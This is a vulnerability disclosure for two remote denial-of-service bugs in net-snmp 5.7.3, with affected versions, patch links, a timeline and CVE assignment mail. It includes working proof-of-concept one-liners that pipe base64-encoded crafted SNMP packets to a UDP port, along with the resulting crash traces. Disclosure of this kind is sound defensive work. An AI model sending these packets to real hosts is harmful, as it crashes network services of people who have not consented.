_ _
/ | ___ ___| |_ ___ ___ ___ _____ ___
_ / / | | -_| _|___|_ -| | | . |
|_|_/ |_|_|___|_| |___|_|_|_|_|_| _|
|_|
2018-10-08
Update: "vuln1" was assigned CVE-2015-5621 (see references), therefore CVE-2018-18066 has been marked as duplicate.
NET-SNMP REMOTE DOS
===================
Back in january I did some vulnerability research of net-snmp 5.7.3 and found some bugs.
Here they are:
VULN#1 CVE-2015-5621 (wrongly assigned as CVE-2018-18066)
=========================================================
First bug is remotely exploitable without knowledge of the community string, and leads to Denial of Service:
# echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111
# net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln 127.0.0.1:1111
ASAN:SIGSEGV
=================================================================
==41810==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007f261b bp 0x7fff34754550 sp 0x7fff34754220 T0)
#0 0x7f261a in snmp_oid_compare /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470:13
#1 0x7f261a in _snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4247
#2 0x7f261a in snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4336
#3 0x7f261a in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5241
#4 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
#5 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
#6 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
#7 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
#8 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
#9 0x7f2561efeb44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
#10 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470 snmp_oid_compare
==41810==ABORTING
Same configuration for both bugs:
magnus@h4xb0x:~/projects/net-snmp$ cat snmpd.conf
rocommunity public default -V systemonly
rocommunity public localhost -V systemonly
rouser authOnlyUser
syslocation "On the Desk"
syscontact Me <
me@example.org>
VULN#2 CVE-2018-18065
=====================
Second bug is also remotely exploitable but only with knowledge of the community string (in this case "public") leading to Denial of Service:
# echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111
# net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln 127.0.0.1:1111
ASAN:SIGSEGV
=================================================================
==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0)
#0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9
#1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614
#2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749
#3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
#4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12
#5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9
#6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
#7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14
#8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22
#9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18
#10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14
#11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10
#12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7
#13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
#14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
#15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
#16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
#17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
#18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
#19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key
==41062==ABORTING
PATCHES
=======
Update to net-snmp-5.8 or apply the following patches:
Vuln#1:
sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791Vuln#2:
sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457dAFFECTED
========
- 5.7.3
- 5.6.2.1
- 5.5.2.1
More versions may be affected as well.
TIMELINE
========
2015-04-11 Vendor releases patch of bug#1 in version control - no public article or otherwise disclosure
2016-10-06 Vendor releases patch of bug#2 in version control - no public article or otherwise disclosure
2018-01-05 I discovered both bugs
2018-01-08 Vendor notified
2018-01-08 Vendor responds - bugs already fixed in version control repo
2018-10-08 Public disclosure of exploit
2018-10-08 CVE-ID assignment
2018-10-09 CVE-2018-18066 marked as duplicate of CVE-2015-5621
PROOF OF DISCOVERY
==================
# cat vuln1 | base64
MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBw
bwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBACh
WQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEH
CobetzgECzE3Mi4zMS4xOS4y
# sha256sum vuln1
b2ff63c97c705c25c0043758cbd7b1e00cb5692ba1223712a17461082a047125 vuln1
twitter.com/magnusstubman/status/949520650762358789 # cat vuln2 | base64
MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu
MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN
MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y
# sha256sum vuln2
b7f0e494b8a91c6fedb7e13b3b8dab68a951b5fdc21dd876ae91eb86924018f2 vuln2
twitter.com/magnusstubman/status/949520565064404994REFERENCES
==========
-
sourceforge.net/p/net-snmp/bugs/2820-
sourceforge.net/p/net-snmp/bugs/2819-
openwall.com/lists/oss-security/2018/10/08/4-
openwall.com/lists/oss-security/2018/10/09/1-
openwall.com/lists/oss-security/2015/07/31/1CVE ASSIGNMENTS
===============
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
> [Suggested description]
> _set_key in agent/helpers/table_container.c in
> Net-SNMP before 5.8
> has a NULL Pointer Exception bug that can be used by an
> authenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> resulting in Denial of Service.
>
> ------------------------------------------
>
> [Additional Information]
> Proof of concept exploit are publicly available at
dumpco.re/blog/net-snmp-5.7.3-remote-dos>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Denial of Service (Null Pointer Exception)
>
> ------------------------------------------
>
> [Vendor of Product]
> net-snmp
>
> ------------------------------------------
>
> [Affected Product Code Base]
> net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
>
> ------------------------------------------
>
> [Affected Component]
> snmpd
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> A crafted UDP packet must be sent to the target.
>
> ------------------------------------------
>
> [Reference]
>
dumpco.re/blog/net-snmp-5.7.3-remote-dos>
sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
Use CVE-2018-18065.
> [Suggested description]
> snmp_oid_compare in snmplib/snmp_api.c in
> Net-SNMP before 5.8
> has a NULL Pointer Exception bug that can be used by an
> unauthenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> resulting in Denial of Service.
>
> ------------------------------------------
>
> [Additional Information]
> Proof of concept exploit are publicly available at
dumpco.re/blog/net-snmp-5.7.3-remote-dos>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Denial of Service (NULL Pointer Exception)
>
> ------------------------------------------
>
> [Vendor of Product]
> net-snmp
>
> ------------------------------------------
>
> [Affected Product Code Base]
> net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
>
> ------------------------------------------
>
> [Affected Component]
> snmpd
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> A crafted UDP packet must be sent to the target.
>
> ------------------------------------------
>
> [Reference]
>
dumpco.re/blog/net-snmp-5.7.3-remote-dos>
sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791>
sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
Use CVE-2018-18066.
- --
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCAAGBQJbu5sQAAoJEA2h+fVryJLo8M0P/0PHKRFRLetcB4kLwkzX3Rbo
Hr2FVj83nQEFpbU+R94bhneu1ee54zGTBFnQj6FRqEFgrK4xWE8EwNdrshQSbcRZ
bjPXA/SneIqZlg//Btpa/4HljWgLlwKYoQQD3MzzmuO72yfkfRESOhXpKZLcUP8b
YDATpZERG8oY4TA7zDNj2d3L98U18CcBhNrlBPmEtUnrJcCjsklZM6Cbw0x1DHa1
vBoB2HSJH94Cnl4603vJhrUn7ZAxkuAManul0pTVLhPSryBc4uNptUkWEU2aU9xp
1wvwpsy7syWhlTgJhwH2Gt8EEQxDHFer4AhatkYdjX8hw+SAYoFBDIEQxqPYgu+2
NamzJl6l8NXruw9YzkJhpWpYFusBEikOVHeJoUYGoSZISACduLTmVCne2Axb2Vkg
USjP4jyYi7ZFMVd4uNkEnIUzjJmpKXBGkPqb9VktEAMaLLBgHPJI4ZFuyEYxzU0M
VLKu7ZEu66QvS5vLFEPQcQQPbFrwYMlS4QyCc4KrwyojSWkObX5j9mrLBsb42OQU
B+ilV27e+wJu1kA9hMLHfTT1/AV48JyyVDk5T7SGiVr3sho7HodWFW+Mc5UCgz38
e/ERoBUpod82bmFuQQSdbrDXVfKloyV9h909YJJkL7w37CABHoeySB/ejcDh9ZCJ
5R0qeB5HVvtNE8xM5Oej
=WaAB
-----END PGP SIGNATURE-----
<
/me@example.org>